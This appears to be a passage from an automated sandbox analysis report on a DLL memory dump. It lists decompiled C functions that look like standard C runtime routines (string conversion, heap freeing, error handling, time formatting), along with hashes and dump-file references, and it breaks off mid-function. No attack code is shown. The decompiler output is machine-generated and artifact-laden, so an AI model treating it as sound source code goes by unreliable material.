Instruction ID: 34003bfcad6186f19277b761f9977656ba6f3036cd36e95f19bf2f498b18fda9
Opcode Fuzzy Hash: 796e6444d5f5245c307bbaed419fb8c85de091e52bfd47d3223efb4feca62440
Instruction Fuzzy Hash: B0F0A4B190051DBFDF019F90C958F9EBFBAEB45712F104454A806A6150DB304A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E214E2A, Relevance: 7.7, APIs: 5, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E6E214E2A(void* __ebx, int __edx, void* __edi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				int _v44;
				char _v48;
				void* __esi;
				signed int _t59;
				char* _t61;
				int _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				int _t106;
				int _t107;
				short* _t109;
				int _t110;
				int _t111;
				signed int _t112;

				_t106 = __edx;
				_t59 =  *0x6e28506c; // 0x9881d723
				_v8 = _t59 ^ _t112;
				_t61 = _a4;
				_t91 = _a12;
				_t111 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t109 = _a8;
				_v24 = _t109;
				if(_t61 == 0 || _t91 != 0) {
					if(_t109 != 0) {
						E6E1F1F60(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t111) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t111, _t109, 0xffffffff, _t111, _t111, _t111,  &_v20);
								if(_t64 == 0 || _v20 != _t111) {
									L55:
									_t65 = E6E202281();
									_t110 = _t109 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t110 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t109 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t110 = _t111;
								goto L56;
							}
							_t106 = 0xff;
							while(_t68 <= _t106) {
								_t109 =  &(_t109[1]);
								_t111 = _t111 + 1;
								_t68 =  *_t109 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t106 = _v44;
						if( *((intOrPtr*)(_t106 + 0xa8)) != _t111) {
							if( *((intOrPtr*)(_t106 + 4)) != 1) {
								_t110 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, 0xffffffff, _t98, _t91, _t111,  &_v20);
								if(_t110 == 0) {
									if(_v20 != _t111 || GetLastError() != 0x7a) {
										L45:
										_t71 = E6E202281();
										_t111 = _t111 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t107 = _v44;
											_t103 =  *(_t107 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t107 + 8), _t111, _t73, 1,  &_v16, _t103, _t111,  &_v20);
											_t93 = _a12;
											_t106 = _t74;
											if(_t106 == 0 || _v20 != _t111 || _t106 < 0 || _t106 > 5) {
												goto L55;
											}
											if(_t106 + _t110 > _t93) {
												goto L56;
											}
											_t76 = _t111;
											_v32 = _t76;
											if(_t106 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t110 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t112 + _t76 - 0xc));
												 *((char*)(_t105 + _t110)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t110 = _t110 + 1;
												_v32 = _t76;
												if(_t76 < _t106) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t111) {
									goto L45;
								}
								_t28 = _t110 - 1; // -1
								_t111 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t111 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, _t91, _t98, _t91, _t111,  &_v20);
								if(_t111 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t111 - 1] == 0) {
										_t111 = _t111 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t109;
							_v24 = _t91;
							while( *_t83 != _t111) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t111 &&  *_t83 == _t111) {
								_t91 = (_t83 - _t109 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						_t106 = 0xff;
						while( *_t109 <= _t106) {
							_t98[_t111] =  *_t109;
							_t85 =  *_t109;
							_t109 =  &(_t109[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t111 = _t111 + 1;
							if(_t111 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E6E202281())) = 0x16;
					E6E20215B();
					goto L59;
				} else {
					L59:
					return E6E1DF8A5(_v8 ^ _t112, _t106, _t111);
				}
			}

0x6e214e2a
0x6e214e32
0x6e214e39
0x6e214e3c
0x6e214e40
0x6e214e44
0x6e214e46
0x6e214e49
0x6e214e4d
0x6e214e50
0x6e214e55
0x6e214e64
0x6e214e84
0x6e214e89
0x6e214e8e
0x6e21502b
0x6e215034
0x6e215066
0x6e21506e
0x6e21507a
0x6e21507a
0x6e21507f
0x6e215082
0x00000000
0x6e215075
0x6e215075
0x6e215075
0x6e215088
0x6e21508c
0x6e215091
0x6e215091
0x00000000
0x6e215098
0x6e21506e
0x6e215036
0x6e21503c
0x6e215054
0x6e215054
0x00000000
0x6e215054
0x6e21503e
0x6e215043
0x6e215048
0x6e21504b
0x6e21504c
0x6e215052
0x00000000
0x00000000
0x00000000
0x6e215052
0x00000000
0x6e215043
0x6e214e94
0x6e214e9d
0x6e214ed7
0x6e214f50
0x6e214f54
0x6e214f6a
0x6e21501b
0x6e21501b
0x6e215020
0x6e215023
0x00000000
0x6e214f7f
0x6e214f81
0x00000000
0x00000000
0x6e214f87
0x6e214f8a
0x6e214f8a
0x6e214f8d
0x6e214f93
0x6e214f97
0x6e214f97
0x6e214fa9
0x6e214faf
0x6e214fb2
0x6e214fb6
0x00000000
0x00000000
0x6e214fdb
0x00000000
0x00000000
0x6e214fe1
0x6e214fe3
0x6e214fe8
0x6e215008
0x6e21500b
0x6e21500e
0x6e215013
0x00000000
0x00000000
0x00000000
0x6e215019
0x6e214fea
0x6e214fed
0x6e214fed
0x6e214ff1
0x6e214ff6
0x00000000
0x00000000
0x6e214fff
0x6e215000
0x6e215001
0x6e215006
0x00000000
0x00000000
0x00000000
0x6e215006
0x00000000
0x6e214fed
0x00000000
0x6e214f8a
0x6e214f6a
0x6e214f59
0x00000000
0x00000000
0x6e214f5f
0x6e214f5f
0x00000000
0x6e214f5f
0x6e214edb
0x6e214f01
0x6e214f14
0x6e214f18
0x00000000
0x6e214f28
0x6e214f30
0x6e214f36
0x6e214f36
0x00000000
0x6e214f30
0x6e214f18
0x6e214edd
0x6e214edf
0x6e214ee2
0x6e214ee7
0x6e214eea
0x6e214eea
0x6e214eee
0x00000000
0x00000000
0x00000000
0x6e214eee
0x6e214ef3
0x6e214f00
0x6e214f00
0x00000000
0x6e214ef3
0x6e214ea1
0x00000000
0x00000000
0x6e214ea7
0x6e214eac
0x6e214eb7
0x6e214eba
0x6e214ebd
0x6e214ec3
0x00000000
0x00000000
0x6e214ec9
0x6e214ecc
0x00000000
0x00000000
0x00000000
0x6e214ece
0x00000000
0x6e214eac
0x6e214e6b
0x6e214e71
0x00000000
0x6e214e5b
0x6e21509a
0x6e2150aa
0x6e2150aa

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a922780fa2686a65b89e4e88ecd805d8e5f1adeb566fdaa0f56722fa6bd7de03
Instruction ID: 12ba495f18d550d402da53dc9144561aeb8492f18938f9b1c3e8a3880174dbdc
Opcode Fuzzy Hash: a922780fa2686a65b89e4e88ecd805d8e5f1adeb566fdaa0f56722fa6bd7de03
Instruction Fuzzy Hash: 0D71C23195821F9FDB118FD4C884AEFBBB6EF49315F140569EA2467280C7B18A46CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E20A737, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E20A737(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x6e28506c; // 0x9881d723
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E6E201F1D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E6E1DF8FA(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E6E1DF8FA(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E6E1DF8FA(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E6E21AC0E(_t56);
						_t40 = E6E20CBD3(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E6E21AC0E(_t56);
						E6E20CBD3(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x6e28506c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

0x6e20a737
0x6e20a741
0x6e20a745
0x6e20a747
0x6e20a74b
0x6e20a755
0x6e20a766
0x6e20a76b
0x6e20a76d
0x6e20a76f
0x6e20a771
0x6e20a773
0x6e20a777
0x6e20a831
0x6e20a83f
0x6e20a841
0x6e20a846
0x6e20a84d
0x6e20a84f
0x6e20a85d
0x6e20a86c
0x6e20a86f
0x6e20a871
0x00000000
0x6e20a872
0x6e20a77f
0x6e20a784
0x6e20a789
0x6e20a78b
0x6e20a78b
0x6e20a78d
0x6e20a792
0x6e20a796
0x6e20a796
0x6e20a799
0x6e20a7b8
0x6e20a7b8
0x6e20a7ba
0x6e20a7bd
0x6e20a7c6
0x6e20a7c9
0x6e20a7ce
0x6e20a7d1
0x6e20a7d6
0x00000000
0x00000000
0x6e20a7d8
0x00000000
0x6e20a79b
0x6e20a79b
0x6e20a79d
0x6e20a7a6
0x6e20a7a9
0x6e20a7ae
0x6e20a7b1
0x6e20a7b6
0x6e20a7e0
0x6e20a7e3
0x6e20a7e5
0x6e20a7e8
0x6e20a7f0
0x6e20a7f6
0x6e20a7fd
0x6e20a7ff
0x6e20a807
0x6e20a816
0x6e20a81a
0x6e20a81c
0x6e20a81f
0x00000000
0x00000000
0x6e20a821
0x6e20a824
0x6e20a826
0x6e20a826
0x6e20a827
0x6e20a829
0x6e20a82c
0x00000000
0x6e20a826
0x00000000
0x6e20a7b6
0x6e20a799
0x00000000

APIs

_free.LIBCMT ref: 6E20A7A9
_free.LIBCMT ref: 6E20A7C9

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 29c2e27ee775f1d7ec5e3d75cce2d5fce0701a74ab88fb8b18da25a0307c33c1
Instruction ID: 8da94122120482963eb3a4320ad06f220fef5720222b60db2f9d082a915d6608
Opcode Fuzzy Hash: 29c2e27ee775f1d7ec5e3d75cce2d5fce0701a74ab88fb8b18da25a0307c33c1
Instruction Fuzzy Hash: 4541F376E403089FCB10CFB8C880A9EB7F6EF89714B658569D515EB291E730E902CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E20D683, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6E20D683(void* __ecx, void* __edx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x6e2851e4; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E6E20C7EF(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E6E214196(_t13, __eflags,  *0x6e2851e4, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E6E20D33F(_t13, _t16, 0x6e2876f0);
							E6E20CBD3(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E6E20CBD3();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E6E214140(_t11, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

APIs

GetLastError.KERNEL32(6E1C75D9,6E1C75D9,00000002,6E202286,6E20F2B0,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004), ref: 6E20D688
_free.LIBCMT ref: 6E20D6BD
_free.LIBCMT ref: 6E20D6E4
SetLastError.KERNEL32(00000000,?,6E1C75D9), ref: 6E20D6F1
SetLastError.KERNEL32(00000000,?,6E1C75D9), ref: 6E20D6FA

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 737d46a343d8aa3d13f6aed43efeae570dd7291891387578a2241627cf15c5a4
Instruction ID: 3fd612a2b0acf8b2f7574502f79f09eb6c195464633906ed7cd4893399175c3f
Opcode Fuzzy Hash: 737d46a343d8aa3d13f6aed43efeae570dd7291891387578a2241627cf15c5a4
Instruction Fuzzy Hash: 7601F9BA18690A2FC30216E56C8DE8B277F9BC377A7240815F419971D1EFB088018974

Uniqueness

Uniqueness Score: -1.00%

Function 6E21CCC3, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E21CCC3(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6e2850b8; // 0x6e2850b0
					if(_t23 != 0) {
						E6E20CBD3(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6e2850bc; // 0x6e287248
					if(_t24 != 0) {
						E6E20CBD3(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6e2850c0; // 0x6e287248
					if(_t25 != 0) {
						E6E20CBD3(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6e2850e8; // 0x6e2850b4
					if(_t26 != 0) {
						E6E20CBD3(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6e2850ec; // 0x6e28724c
					if(_t27 != 0) {
						return E6E20CBD3(_t6);
					}
				}
				return _t6;
			}

0x6e21ccc9
0x6e21ccce
0x6e21ccd2
0x6e21ccd8
0x6e21ccdb
0x6e21cce0
0x6e21cce4
0x6e21ccea
0x6e21cced
0x6e21ccf2
0x6e21ccf6
0x6e21ccfc
0x6e21ccff
0x6e21cd04
0x6e21cd08
0x6e21cd0e
0x6e21cd11
0x6e21cd16
0x6e21cd17
0x6e21cd1a
0x6e21cd20
0x00000000
0x6e21cd28
0x6e21cd20
0x6e21cd2b

APIs

_free.LIBCMT ref: 6E21CCDB

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E21CCED
_free.LIBCMT ref: 6E21CCFF
_free.LIBCMT ref: 6E21CD11
_free.LIBCMT ref: 6E21CD23

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fd5f0ce6d73c023e692cb4d911f0e95239a34f474b052342646876797ed72f6d
Instruction ID: e149d2dc1def0b1a9da9ed15b6017ed24f4d6d6ec98fc70cf8cb8537728c5639
Opcode Fuzzy Hash: fd5f0ce6d73c023e692cb4d911f0e95239a34f474b052342646876797ed72f6d
Instruction Fuzzy Hash: C3F04479444A0E97CA54CAD4E4C6C9B37EFAA0AB117704C15E126DB551D730F98486F1

Uniqueness

Uniqueness Score: -1.00%

Function 6E207D8A, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6E207D8A(void* __ebx, signed int __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v22;
				char _v24;
				signed int _v28;
				signed int* _v32;
				signed int _v33;
				signed int** _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				void* _v64;
				void* __esi;
				signed int _t86;
				intOrPtr _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr _t105;
				signed int _t110;
				void* _t111;
				signed int _t116;
				signed int _t117;
				signed int _t129;
				void* _t133;
				signed int _t135;
				intOrPtr _t143;
				signed short* _t144;
				intOrPtr _t145;
				signed int** _t146;
				signed int _t147;
				signed int* _t148;
				signed int _t149;
				signed int _t152;
				signed short** _t154;
				signed int _t155;
				signed int _t159;
				signed int _t163;
				intOrPtr* _t171;
				signed short _t172;
				signed short* _t173;
				signed int** _t174;
				void* _t175;
				signed short* _t178;
				intOrPtr* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int** _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;

				_t149 = __ecx;
				_t86 =  *0x6e28506c; // 0x9881d723
				_v8 = _t86 ^ _t184;
				_t171 = _a12;
				_v52 = _a4;
				_t143 = _a24;
				_v40 = _a16;
				_v48 = _t171;
				_v44 = _t143;
				_t181 = _a20;
				_v32 = _t181;
				_t91 = _a8;
				if(_t91 == 0) {
					_t178 =  *(_t143 + 0x154);
				} else {
					if(_t91 == 1) {
						_t178 =  *(_t143 + 0x158);
					} else {
						_t178 =  *(_t143 + 0x15c);
					}
				}
				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
					goto L113;
				} else {
					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
					_v33 = _t163;
					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
					_v18 =  *((intOrPtr*)(_t171 + 0xc));
					_v16 =  *((intOrPtr*)(_t171 + 8));
					_v14 =  *((intOrPtr*)(_t171 + 4));
					_v12 =  *_t171;
					_v10 = 0;
					_t191 = _t163;
					if(_t163 == 0) {
						__eflags = 0;
						_t129 = E6E2141EF(0, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t178, 0, 0, 0);
					} else {
						_t129 = E6E2143E3(0, _t191,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t178, 0, 0);
					}
					_t147 = _t129;
					if(_t147 == 0) {
						goto L113;
					} else {
						_t175 = _t147 + _t147;
						_t165 = _t175 + 8;
						asm("sbb eax, eax");
						if((_t175 + 0x00000008 & _t129) == 0) {
							_t181 = 0;
							__eflags = 0;
							L18:
							_v28 = _t181;
							if(_t181 == 0) {
								L30:
								E6E1CDEE1(0);
								_t181 = _v32;
								while(1) {
									L113:
									_t172 =  *_t178 & 0x0000ffff;
									__eflags = _t172;
									if(_t172 == 0) {
										break;
									}
									__eflags =  *_t181;
									if( *_t181 == 0) {
										L28:
										L29:
										return E6E1DF8A5(_v8 ^ _t184, _t172, _t181);
									}
									_v32 = 0;
									_t152 = 0;
									__eflags = 0;
									_v28 = _t178;
									_t144 = _t178;
									_t94 = _t172 & 0x0000ffff;
									do {
										_t144 =  &(_t144[1]);
										_t152 = _t152 + 1;
										__eflags =  *_t144 - _t94;
									} while ( *_t144 == _t94);
									_t95 = _t172 & 0x0000ffff;
									_v28 = _t144;
									_t145 = _v44;
									__eflags = _t95 - 0x64;
									if(__eflags > 0) {
										_t96 = _t95 - 0x68;
										__eflags = _t96;
										if(_t96 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L110:
												_push(0x49);
												L111:
												_pop(_t97);
												_t98 = E6E207154(_t145, _t153, _t178, _v52, _t97, _v48, _v40, _t181, _t145, _v32);
												_t185 = _t185 + 0x1c;
												__eflags = _t98;
												if(_t98 == 0) {
													 *((intOrPtr*)(E6E202281())) = 0x16;
													goto L29;
												}
												L112:
												_t178 = _v28;
												continue;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L110;
											}
											L108:
											_t154 = _v40;
											_t178 =  &(_t178[1]);
											 *( *_t154) = _t172;
											 *_t154 =  &(( *_t154)[1]);
											 *_t181 =  *_t181 - 1;
											continue;
										}
										_t102 = _t96 - 5;
										__eflags = _t102;
										if(_t102 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L105:
												_push(0x4d);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L105;
											}
											goto L108;
										}
										_t103 = _t102 - 6;
										__eflags = _t103;
										if(_t103 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L100:
												_push(0x53);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L100;
											}
											goto L108;
										}
										_t104 = _t103 - 1;
										__eflags = _t104;
										if(_t104 == 0) {
											_t105 = _v48;
											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
												_t173 =  *(_t145 + 0x150);
											} else {
												_t173 =  *(_t145 + 0x14c);
											}
											__eflags = _t152 - 1;
											if(_t152 != 1) {
												L91:
												_t155 =  *_t173 & 0x0000ffff;
												__eflags = _t155;
												if(_t155 == 0) {
													goto L112;
												}
												_t146 = _v40;
												while(1) {
													__eflags =  *_t181;
													if( *_t181 <= 0) {
														goto L112;
													}
													_t173 =  &(_t173[1]);
													 *( *_t146) = _t155;
													 *_t146 =  &(( *_t146)[0]);
													 *_t181 =  *_t181 - 1;
													_t155 =  *_t173 & 0x0000ffff;
													__eflags = _t155;
													if(_t155 != 0) {
														continue;
													}
													goto L112;
												}
											} else {
												__eflags =  *_t181;
												if( *_t181 <= 0) {
													goto L91;
												}
												_t179 = _v40;
												 *((short*)( *_t179)) =  *_t173;
												 *_t179 =  *_t179 + 2;
												 *_t181 =  *_t181 - 1;
											}
											goto L112;
										}
										__eflags = _t104 != 5;
										if(_t104 != 5) {
											goto L108;
										}
										_t153 = _t152;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x79);
											goto L111;
										}
										_t153 = _t153;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x59);
										goto L111;
									}
									if(__eflags == 0) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_v32 = 1;
											L75:
											_push(0x64);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											goto L75;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
											_push(0x61);
											goto L111;
										}
										_t153 = _t153 - 1;
										__eflags = _t153;
										if(_t153 != 0) {
											goto L108;
										}
										_push(0x41);
										goto L111;
									}
									__eflags = _t95 - 0x27;
									if(_t95 == 0x27) {
										_t110 = _t152 & 0x80000001;
										__eflags = _t110;
										if(__eflags < 0) {
											__eflags = (_t110 - 0x00000001 | 0xfffffffe) + 1;
										}
										_t178 =  &(_t178[_t152]);
										if(__eflags == 0) {
											_t159 =  *_t178 & 0x0000ffff;
											__eflags = _t159;
											if(_t159 == 0) {
												goto L28;
											}
											_t174 = _v40;
											while(1) {
												__eflags =  *_t181;
												if( *_t181 == 0) {
													goto L113;
												}
												_t111 = 0x27;
												_t178 =  &(_t178[1]);
												__eflags = _t159 - _t111;
												if(_t159 == _t111) {
													goto L113;
												}
												 *( *_t174) = _t159;
												 *_t174 =  &(( *_t174)[0]);
												 *_t181 =  *_t181 - 1;
												_t159 =  *_t178 & 0x0000ffff;
												__eflags = _t159;
												if(_t159 != 0) {
													continue;
												}
												goto L113;
											}
										}
										continue;
									}
									__eflags = _t95 - 0x41;
									if(_t95 == 0x41) {
										L41:
										_t116 = E6E21806D(_t145, _t178, _t181, _t178, L"am/pm");
										__eflags = _t116;
										if(_t116 != 0) {
											_t117 = E6E21806D(_t145, _t178, _t181, _t178, L"a/p");
											_pop(_t153);
											__eflags = _t117;
											if(_t117 == 0) {
												_v28 =  &(_t178[3]);
											}
										} else {
											_t153 =  &(_t178[5]);
											_v28 =  &(_t178[5]);
										}
										_push(0x70);
										goto L111;
									}
									__eflags = _t95 - 0x48;
									if(_t95 == 0x48) {
										_t153 = _t152 - 1;
										__eflags = _t153;
										if(_t153 == 0) {
